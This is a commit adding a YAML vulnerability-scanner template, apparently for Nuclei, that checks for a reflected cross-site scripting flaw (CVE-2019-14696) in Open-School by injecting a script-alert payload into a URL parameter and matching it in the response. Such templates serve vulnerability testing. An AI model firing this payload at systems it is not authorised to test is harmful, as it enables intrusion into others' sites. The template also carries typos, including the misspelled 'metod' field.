Create CVE-2019-14696.yaml

patch-1
PikPikcU 2020-09-04 15:46:07 +00:00 committed by GitHub
parent da02a01794
commit cc1e0a3fef
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

24
cves/CVE-2019-14696.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2019-14696
info:
name: Open-Scool 3.0/Community Edition 2.3 - Cross Site Scripting
author: pikpikcu
severity: Medium
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2019-14696
# Vendor Homepage: [https://open-school.org/]
requests:
- metod: GET
path:
- '{{BaseURL}}/index.php?r=students/guardians/create&id=1"><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<script>alert(document.domain)</script>'
part: body